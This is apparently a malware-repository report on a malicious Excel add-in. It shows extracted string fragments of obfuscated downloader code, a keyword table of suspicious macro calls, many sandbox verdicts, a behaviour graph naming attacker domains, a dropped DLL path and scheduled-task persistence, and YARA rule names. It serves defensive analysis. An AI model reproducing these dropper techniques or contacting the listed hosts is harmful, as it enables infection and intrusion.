String // //string filePathCAgLy8gc3RyaW5nIGZpbGVQYXRo
String //try //CAgdHJ5DQogICAgICAgIC8vICAg
String //client.DownloadProgressC //time //timeW50LkRvd25sb2FkUHJvZ3Jlc3ND
String //await client.DownloaGF3YWl0IGNsaWVudC5Eb3dubG9h
String //finallyCAgIGZpbmFsbHkNCiAgICAgICAg
String //return tcs.Tr //CAgICAgICByZXR1cm4gdGNzLlRy
StringestProcess.StartInfo.UseShellExecGFydEluZm8uVXNlU2hlbGxFeGVj
String requestProcess.StartInforequestProcesWVzdFByb2Nlc3MuU3RhcnRJbmZv
Stringess.StartInfo.CreatekNyZWF0ZU5vV2luZG93ID0gdHJ1
String //Degitjkg:GVMaW5lKCJnamZka2dpdGprZzog
StringCBzd2l0Y2ggKHN0cmxpc3RbMl0p
String sment.SpecialFo brecaCAgICAgICAgICAgICAgICAgICBz
Stringvironment.GetFolderPm9sZGVyUGF0aChFbnZpcm9ubWVu
StringEnvironment.GetFoCA9IEVudmlyb25tZW50LkdldEZv
String.SpecialFolder.Templi5UZW1wbGF0ZXMpICsgIlxcIjsN
StringdefauCAgICAgICAgICAgICAgIGRlZmF1
String ifEnvironment.GetGF0aCA9PSAiIikNCiAgICAgICAg
Stringnt.SpecialFolder.AppServicePoiGVyLkFwcGxpY2F0aW9uRGF0YSkg
StringificateValidationCalGlvbkNhbGxiYWNrID0gZGVsZWdh
StringServicePointMaCAgICAgIFNlcnZpY2VQb2ludE1h
StringlType.Tl SecurityProtoco
StringlType.Tls SecurityProtoco
StringlType.Ssl3 SecurityProtoco
StringXQ8Cwooi2cF6Aq2zZTANTJ6WlRBTm0rY2hEMWZwNUk2c3c4
Stringam47qhPZ7iczs5nXVWiCBaclK8lvA7sLZHW5YVldpQ0JhY2xLOGx2QTdzTFpI
String5tT89s1EgnbRV8oIXPj5G9JWFBqNWYrYWdaRUszWmtuaU0y
StringCyKO/e2DGKxLPwVSf5nb1ZTZjVuYll4ZkYzUT09Iik7IC8v
Stringstring requestedFilemVxdWVzdGVkRmlsZSA9IGZuYW1l
Stringyou want from serverXJ2ZXINCg0KICAgICAgICAgICAg
Stringusingusing Systemusingus3N0aWNzOw0KdXNpbmcgU3lzdGVt
StringtryCB0cnkNCiAgICAgICAgICAgICAg
Stringusingusing System.kh0dHA7DQp1c2luZyBTeXN0ZW0u
String // Send filenameas fy8gU2VuZCBmaWxlbmFtZSBhcyBm
String var formCAgICAgICAgICAgIHZhciBmb3Jt
Stringusing System.Text.ReusingkV4cHJlc3Npb25zOw0KdXNpbmcg
StringDataContentCAgICAgICAgICAgICAgICAgICB7
Stringusing System.ThreadinameHJlYWRpbmcuVGFza3M7DQpuYW1l
String structIMAGE_DOS_HEADER publicCAgew0KICAgICAgICBwdWJsaWMg
String// Magic number public ushg0KICAgICAgICBwdWJsaWMgdXNo
Stringget filename fromContent-Dispositio20gQ29udGVudC1EaXNwb3NpdGlv
StringBytes on last pageof fileGFnZSBvZiBmaWxlDQogICAgICAg
String// Pages in file pXMgaW4gZmlsZQ0KICAgICAgICBw
String// Relocations publiXRpb25zDQogICAgICAgIHB1Ymxp
String // p_globleCAgICAgICAgIC8vIHBfZ2xvYmxl
String// Size of header inparagraphsWFkZXIgaW4gcGFyYWdyYXBocw0K
StringHeaders.ContentDisposition.FileNamnREaXNwb3NpdGlvbi5GaWxlTmFt
Stringtent.Headers.Content29udGVudERpc3Bvc2l0aW9uICE9
String public// MG9ydCBlX21heGFsbG9jOyAvLyBN
StringContent.Headers.CnNlLkNvbnRlbnQuSGVhZGVycy5D
Stringparagraphs needed publicushortSS value puCAgICAgIHB1YmxpYyB1c2hvcnQg
StringfileNamCAgICAgICAgICAgICBmaWxlTmFt
String// Initial SP value pCBTUCB2YWx1ZQ0KICAgICAgICBw
String// Checksum public u3VtDQogICAgICAgIHB1YmxpYyB1
Stringntent.Headers.ContentDisposition.FkNvbnRlbnREaXNwb3NpdGlvbi5G
StringInitial IP value publicWx1ZQ0KICAgICAgICBwdWJsaWMg
String p_glCAgICAgICAgICAgICAgICBwX2ds
String// InitialGF0aXZlKSBDUyB2YWx1ZQ0KICAg
StringSave the responsestream to diskG9uc2Ugc3RyZWFtIHRvIGRpc2sN
String public// OvenQgZV9vdm5vOyAgICAgLy8gT3Zl
String public uintReseV9yZXMxOyAgICAgICAvLyBSZXNl
String SystfileBymZlci5CbG9ja0NvcHkoZmlsZUJ5
String public uintReservedCAgICAgIC8vIFJlc2VydmVkDQog
String FileUFsbEJ5dGVzKHBfZ2xvYmxlMSwg
String public// OEMnQgZV9vZW1pbmZvOyAgLy8gT0VN
Stringystem.IO.Path.ChangekNoYW5nZUV4dGVuc2lvbihwX2ds
Stringe_oemid specific public uinte_CAgICAgIHB1YmxpYyB1aW50IGVf
StringmkbpDgeaIbETxENCwM1KU5Dd00xS1E9PSIpKTsNCiAgICAg
StringReserved public uintHVibGljIHVpbnQgZV9yZXM0OyAg
String codeCAgICAgICAgICAgICAgIGNvZGUg
String public uintWludCBlX3JlczU7ICAgICAgIC8v
String elseCBlbHNlDQogICAgICAgICAgICAg
String //elseCAgICAgICAgICB7DQogICAgICAg
String public uintReservmVzNjsgICAgICAgLy8gUmVzZXJ2
String structIMAGE_FILE_HEADER pEVSDQogICAgew0KICAgICAgICBw
String7iczs5nXVWiCBaclK8lvA7sLZHiC1to413WNsSzhsdkE3c0xaSGlDMXRvNDEz
String staticpublic void try2lkIGl5dXRpZXJqayhzdHJpbmcg
String publicushort SizeOfOptionaHVzaG9ydCBTaXplT2ZPcHRpb25h
String ServicePointManager.ServmljZVBvaW50TWFuYWdlci5TZXJ2
String publicushort struGFyYWN0ZXJpc3RpY3M7DQogICAg
String ServicePointManager.Expect100CW50TWFuYWdlci5FeHBlY3QxMDBD
StringADER32 public ushoQogICAgICAgIHB1YmxpYyB1c2hv
String ServicePointManager.S2VydmljZVBvaW50TWFuYWdlci5T
String public bytem9yTGlua2VyVmVyc2lvbjsNCiAg
StringcurityProtocolType.TlsFR5cGUuVGxzDQogICAgICAgICAg
String public uintSizeOfInitializeWludCBTaXplT2ZJbml0aWFsaXpl
StringityProtocolType.Tls11GUuVGxzMTENCiAgICAgICAgICAg
String public uintSizeOfUninitializedDlVuaW5pdGlhbGl6ZWREYXRhOw0K
StringtyProtocolType.Tls12S5UbHMxMg0KICAgICAgICAgICAg
StringEncoding.UTF8.GetBytkdldEJ5dGVzKHp4YSkpOw0KDQog
String--axxyyuiyt---------i0tYXh4eXl1aXl0LS0tLS0tLS0t
StringMajorOperatingSystemmdTeXN0ZW1WZXJzaW9uOw0KICAg
StringDateTime.Now.Ticks.TGlja3MuVG9TdHJpbmcoIngiKTsN
StringinorOperatingSystemV3lzdGVtVmVyc2lvbjsNCiAgICAg
Stringrequest.ContentTypeHlwZSA9IGdqZmRrZ2l0amtnKCIz
String publicushortMinorSubsystemV2hvcnQgTWlub3JTdWJzeXN0ZW1W
StringzIx/iUIqmWuo5pKgTYkEX/fUbu55IOX1q2EtnVFlrRVgvZlVidTU1SU9YMXEy
String public uint publWNrU3VtOw0KICAgICAgICBwdWJs
String publicushort DllCharactGljIHVzaG9ydCBEbGxDaGFyYWN0
String//string formgHbD3WvXlxzFivCAgICAgICAvL3N0cmluZyBmb3Jt
String public uint pubXJGbGFnczsNCiAgICAgICAgcHVi
StringEncoding.ASCII.GVyID0gRW5jb2RpbmcuQVNDSUku
StringizeOfInitializedData pubmVkRGF0YTsNCiAgICAgICAgcHVi
String publicCk7DQogICAgICAgICAgICAgICAg
Stringushort MajorOperatinXRpbmdTeXN0ZW1WZXJzaW9uOw0K
String //Initia whileGl6ZUNvbXBvbmVudCgpOw0KICAg
Stringushort MinorOperatinW5nU3lzdGVtVmVyc2lvbjsNCiAg
StringHuoLAYhYHSz6HTWFkLlNsZWVwKHJkLk5leHQoMSwg
String4NBtR4NJUu3WVDBxSsQmWBWLYTQhhLbI7tEJ4U3NRbUdobVpUMFhSaHVsdz0i
String publicushort MinorSubsystyB1c2hvcnQgTWlub3JTdWJzeXN0
Stringnt.GetEnvironmentVarWVudFZhcmlhYmxlKGdqZmRrZ2l0
String public uint pENoZWNrU3VtOw0KICAgICAgICBw
String public ulongyBTaXplT2ZTdGFja1Jlc2VydmU7
StringServerCertificateValidationCallbac Serv2F0ZVZhbGlkYXRpb25DYWxsYmFj
Stringager.SecurityProtocoHJvdG9jb2wgPSBTZWN1cml0eVBy
StringIMAGE_FILE_HEADER strucEZpbGVIZWFkZXI7DQogICAgfQ0K
String publicIMAGE_FILE_HEADEREVBREVSIEZpbGVIZWFkZXI7DQog
StringwdvGYiv/k1y9oL SecurityProtoco
StringOPTIONAL_HEADER32VIzMiBPcHRpb25hbEhlYWRlcjsN
StringIMAGE_NT_HEADERS64 public uiHsNCiAgICAgICAgcHVibGljIHVp
StringWiCBaclK8lvA7sLZHiC1to413bIeL/tTS30xaSGlDMXRvNDEzYkllTC90VFMz
String publicIMAGE_FILE_HEADERFileHe0VfRklMRV9IRUFERVIgRmlsZUhl
String public IMAGE_OPTIONAL_HEADER64Optional public classCoyoteMaths pkFMX0hFQURFUjY0IE9wdGlvbmFs
StringCruEYZK9MCg5HlPIB4gT32xVNCJF1UvtkAFBJQjRnVDMyeFZOQ0pGMVV2dGtB
SuspiciousEnvironMay read system environment variables
SuspiciousOpenMay open a file
SuspiciousWriteMay write to a file (if combined with Open)
SuspiciousBinaryMay read or write a binary file (if combinedwith Open)
SuspiciousADODB.StreamMay create a text file
SuspiciousSaveToFileMay create a text file
SuspiciousShellMay run an executable file or a systemcommand
SuspiciousvbHideMay run an executable file or a systemcommand
SuspiciousCreateObjectMay create an OLE object
SuspiciousWindowsMay enumerate application windows (ifcombined with Shell.Application object)
SuspiciousSystemMay run an executable file or a systemcommand on a Mac (if combined withlibc.dylib)
SuspiciousEnvironmentMay read system environment variables
SuspiciousRunMay run an executable file or a system
SuspiciousCreateMay execute file or a system command through
SuspiciousDownloadFileMay download files from the Internet using
SuspiciousHex StringsHex-encoded strings were detected, may beused to obfuscate strings (option --decode tosee all)
SuspiciousBase64 StringsBase64-encoded strings were detected, may beused to obfuscate strings (option --decode tosee all)

Intelligence

File Origin
# of uploads :
5
# of downloads :
135
Origin country :
HU HU
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Nominated Officials for the Conference.xlam
Verdict:
No threats detected
Analysis date:
2025-10-11 08:30:36 UTC
Tags:
macros macros-on-open
Link:
https://app.any.run/tasks/e3cd9432-cc15-425d-b427-6ae2f8d63fb4

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/32406/
Verdict:
Malicious
Score:
96.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=68ea1533f2ca2f143e41446b
Tags:
autorun office macro micro
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a window
Сreating synchronization primitives
Creating a file
Creating a process with a hidden window
Launching a process
Creating a file in the %temp% directory
Launching a process by exploiting the app vulnerability
Unauthorized injection to a system process
Enabling autorun by creating a file
Result
Verdict:
Malicious
File Type:
Excel File with Macro
Link:
https://app.docguard.net/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207/results/dashboard
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
base64 cmd conhost lolbin macros macros-on-open masquerade persistence schtasks
Link:
https://www.filescan.io/uploads/68ea1534fe81c560ba570c20/reports/cfb2df48-35ad-4855-ae63-279a48ac35ee/overview
Verdict:
Malicious
Labled as:
VB.Heur2.EmoDldr.5.8AC20C2D
Link:
https://www.hybrid-analysis.com/sample/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
Label:
Malicious
Suspicious Score:
10/10
Score Malicious:
1%
Score Benign:
0%
Link:
https://www.malware.ai/gui/files/?id=12914a42-e216-48ce-9257-b8d8576e0f67
Result
Verdict:
MALICIOUS
Link:
https://labs.inquest.net/dfi/sha256/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
Details
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
Macro with File System Write
Detected macro logic that can write data to the file system.
Document With No Content
Document contains little or no semantic information.
InQuest TF/IDF Classifier
An InQuest machine-learning model classified this macro as potentially malicious.
Macro Contains Suspicious String
Detected a macro with a suspicious string. Suspicious strings include privileged function calls, obfuscations, odd registry keys, etc...
Macro with Hidden Shell
The VBA Shell() command is leveraged by this macro with a window style of '0' or 'vbHide'.
Verdict:
Malicious
File Type:
xlam
First seen:
2025-09-30T07:25:00Z UTC
Last seen:
2025-10-12T03:28:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Dropper.Win32.Agent.sb HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.MSOffice.SAgent.gen HEUR:Trojan.BAT.Miner.gen PDM:Trojan.Win32.Generic HEUR:Trojan.Multi.Miner.gen Trojan.MSOffice.SAgent.sb Trojan.MSIL.Dnoper.sb
Link:
https://opentip.kaspersky.com/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207/results?tab=lookup
Result
Threat name:
n/a
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1793319
Signature
Antivirus detection for dropped file
Antivirus detection for URL or domain
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document exploit detected (process start blacklist hit)
Multi AV Scanner detection for submitted file
Obfuscated command line found
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Schedule system process
Sigma detected: Suspicious Microsoft Office Child Process
Uses schtasks.exe or at.exe to add and modify task schedules
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1793319 Sample: Nominated Officials for the... Startdate: 11/10/2025 Architecture: WINDOWS Score: 100 43 www.keeferbeautytrends.com 2->43 45 us1.roaming1.live.com.akadns.net 2->45 47 13 other IPs or domains 2->47 59 Antivirus detection for URL or domain 2->59 61 Antivirus detection for dropped file 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 10 other signatures 2->65 8 EXCEL.EXE 249 67 2->8         started        13 cmd.exe 1 2->13         started        15 cmd.exe 1 2->15         started        signatures3 process4 dnsIp5 55 part-0013.t-0009.t-msedge.net 13.107.246.41, 443, 49712, 49713 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->55 57 osiprod-ncus-buff-azsc-000.northcentralus.cloudapp.azure.com 52.109.16.112, 443, 49699 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->57 41 ~$Nominated Offici...onference.xlam.xlsx, data 8->41 dropped 67 Office process queries suspicious COM object (likely to drop second stage) 8->67 17 csc.exe 4 8->17         started        20 InstallUtil.exe 15 5 8->20         started        23 splwow64.exe 1 8->23         started        69 Obfuscated command line found 13->69 71 Uses schtasks.exe or at.exe to add and modify task schedules 13->71 25 conhost.exe 13->25         started        27 schtasks.exe 1 13->27         started        29 curl.exe 1 15->29         started        31 cmd.exe 1 15->31         started        file6 signatures7 process8 dnsIp9 39 C:\ProgramData\USOShared\vlcplayer.dll, PE32 17->39 dropped 33 conhost.exe 17->33         started        35 cvtres.exe 1 17->35         started        49 msoffice.365cloudz.esanojinjasvc.com 78.110.166.82, 443, 49705, 49707 UKSERVERS-ASUKDedicatedServersHostingandCo-Location United Kingdom 20->49 37 conhost.exe 20->37         started        51 keeferbeautytrends.com 72.9.158.105, 443, 49710 ASN-DISUS United States 29->51 53 127.0.0.1 unknown unknown 29->53 file10 process11
Score:
100%
Verdict:
Malware
File Type:
OFFICE
Link:
https://malprob.io/report/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
Verdict:
Malware
YARA:
3 match(es)
Tags:
ADODB.Stream Blacklist VBA MSXML2.DOMDocument Office Document
Link:
https://app.malva.re/file/b165b489c5f8c4e136364664502d68f1
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207/
Verdict:
Malicious
Threat:
Trojan.MSIL.Dnoper
Link:
https://tip.neiki.dev/file/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207
Threat name:
Script-Macro.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-09-30 12:18:45 UTC
File Type:
Document
Extracted files:
28
AV detection:
17 of 38 (44.74%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ewowyegjh6sponfwvz6pssshr27omhisnc7srpx4acphdvqjwidq._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery macro
Link:
https://tria.ge/reports/251011-kdaekazzbt/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Network Share Discovery
Drops startup file
Loads dropped DLL
Process spawned unexpected child process
Verdict:
Suspicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/998f1a4c-ee53-4fd7-8875-8ae9d799fdb5
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/259d6c10c93f/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/259d6c10c93fa4f734b6ae7cf94a478ebee61d1268bf28befc009e71d609b207

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Detect_PowerShell_Obfuscation
Create hunting rule
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.
Rule name:FreddyBearDropper
Create hunting rule
Author:Dwarozh Hoshiar
Description:Freddy Bear Dropper is dropping a malware through base63 encoded powershell scrip.
Rule name:informational_win_ole_protected
Create hunting rule
Author:Jeff White (karttoon@gmail.com) @noottrak
Description:Identify OLE Project protection within documents.
Rule name:NET
Create hunting rule
Author:malware-lu
Rule name:vbaproject_bin
Create hunting rule
Author:CD_R0M_
Description:{76 62 61 50 72 6f 6a 65 63 74 2e 62 69 6e} is hex for vbaproject.bin. Macros are often used by threat actors. Work in progress - Ran out of time

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/32406/

Comments